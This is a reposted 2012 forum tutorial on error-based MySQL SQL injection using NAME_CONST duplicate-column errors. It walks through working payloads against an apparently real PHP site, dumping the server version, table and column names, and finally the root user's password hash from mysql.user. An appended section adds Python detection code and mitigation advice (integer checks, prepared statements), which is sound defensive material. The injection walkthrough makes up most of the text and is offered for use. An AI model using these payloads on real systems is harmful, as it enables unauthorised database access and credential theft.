Exploiting NAME_CONST injection: an error-based injection technique for newer MySQL versions

Views: 1551 | Replies: 0 | 2012-3-19 23:27:35
It's been a while since I've made an SQL injection tutorial, so I thought I should make a new one using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to write a guide for it.
Background
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
Code:
NAME_CONST(name, value)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
SELECT NAME_CONST('TEST', 1);
+------+
| TEST |
+------+
|    1 |
+------+
http://域名/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261'
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = the MySQL variable (or function) you want to read. Both NAME_CONST() calls give their column the same name, so the derived table ends up with two identically named columns and MySQL refuses it with "Duplicate column name '...'", echoing the value inside the error message.
See the MySQL 5.1 reference for the list of server system variables.
Let's try it out on my site..
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
Error:Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
We should get a duplicate column name '1' error...
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
Error:Duplicate column name '1'
Now let's get the tables out this bitch..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here, if it does, we can go on and finish the job.
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Error:Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
Error:Duplicate column name 'Host'
Woot, time to finish this bitch off.
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this...
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
Error:Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
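The trick above leaves two clear traces for a defender: the request carries a derived table with the same NAME_CONST() expression twice (plus information_schema lookups once enumeration starts), and the application's error output contains "Duplicate column name '<leaked value>'". As an added example that is not part of the original post, the Python below scans constructed access-log lines for those request patterns, enforces the integer check that the `id`/`sid`/`cid` parameters should have had in the first place, and pulls leaked values out of constructed MySQL error lines so an error log can be audited after the fact. The log format, the parameter names being numeric ids, and all IPs and timestamps are assumptions for this example.

```python
"""Detect NAME_CONST error-based injection attempts (added example, not the tutorial's code)."""
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format, no referer/agent).
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Mar/2012:23:27:35 +0800] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [19/Mar/2012:23:28:01 +0800] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261\' HTTP/1.1" 500 812',
    '203.0.113.5 - - [19/Mar/2012:23:28:40 +0800] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 900',
    '203.0.113.5 - - [19/Mar/2012:23:29:12 +0800] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261%20and%201%3D(select%20*%20from%20(select%20NAME_CONST((select%20table_name%20from%20information_schema.tables%20where%20table_schema%3Ddatabase()%20limit%200%2C1)%2C1)%2CNAME_CONST((select%20table_name%20from%20information_schema.tables%20where%20table_schema%3Ddatabase()%20limit%200%2C1)%2C1))%20as%20x)-- HTTP/1.1" 500 910',
    '198.51.100.7 - - [19/Mar/2012:23:30:00 +0800] "GET /qcwh/content/detail.php?id=331&sid=19&cid=261 HTTP/1.1" 200 5100',
]

# Constructed application error-log lines; the quoted values are the ones shown in the post.
SAMPLE_ERRORS = [
    "[19-Mar-2012 23:28:40] PHP Warning: mysql_query(): Duplicate column name '5.0.27-community-nt'",
    "[19-Mar-2012 23:29:12] PHP Warning: mysql_query(): Duplicate column name 'com_admanage'",
    "[19-Mar-2012 23:30:00] PHP Notice: Undefined index: page",
]

# Assumption: these parameters are integer ids in the application.
NUMERIC_PARAMS = {"id", "sid", "cid"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A derived table that selects NAME_CONST(expr, 1) twice with the same expr:
# the backreference (?P=expr) requires both expressions to be identical.
NAME_CONST_DUP_RE = re.compile(
    r"select\s+\*\s+from\s*\(\s*select\s+name_const\s*\((?P<expr>.+?),\s*1\s*\)"
    r"\s*,\s*name_const\s*\((?P=expr),\s*1\s*\)\s*\)\s*as\s+\w+",
    re.IGNORECASE | re.DOTALL,
)
INFO_SCHEMA_RE = re.compile(r"information_schema\.(tables|columns)", re.IGNORECASE)
DUP_COL_RE = re.compile(r"Duplicate column name '([^']*)'")


def decode_query(path):
    """Split the query string and percent/plus-decode every key and value."""
    query = path.partition("?")[2]
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")  # keep any '=' inside the value
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def is_valid_numeric_param(value):
    """The input check the vulnerable page lacked: an id must be all digits."""
    return value.isdigit()


def classify(params):
    """Return the list of rule names that fire on the decoded parameters."""
    findings = []
    for name, value in params.items():
        if name in NUMERIC_PARAMS and not is_valid_numeric_param(value):
            findings.append(f"non_numeric:{name}")
        if NAME_CONST_DUP_RE.search(value):
            findings.append("name_const_duplicate_column")
        if INFO_SCHEMA_RE.search(value):
            findings.append("information_schema_enum")
    return findings


def scan_log(lines):
    """Parse each access-log line and report the ones with findings."""
    alerts = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        findings = classify(decode_query(match.group("path")))
        if findings:
            alerts.append({"ip": match.group("ip"), "ts": match.group("ts"),
                           "status": int(match.group("status")), "findings": findings})
    return alerts


def leaked_values(error_lines):
    """Values that reached an error message via the duplicate-column trick."""
    return [m.group(1) for line in error_lines for m in [DUP_COL_RE.search(line)] if m]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
    print("leaked:", leaked_values(SAMPLE_ERRORS))
```

The `non_numeric` rule is the important one for mitigation: a numeric id parameter cast with `intval()` or bound through a prepared statement never reaches the query as `261 and 1=(select ...)`, and the other two rules only matter while raw database errors are still being shown to the client.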
Disclaimer: this article comes from http://www.hackbase.com/Soft/html/9/18/2011/2011101021246.htm. Its content represents only the original author's personal views and is unrelated to this site. This site has not verified its originality or the statements and content in it, and makes no guarantee or commitment as to the truthfulness, completeness or timeliness of the article or any part of it; readers should treat it as reference only and verify the content themselves.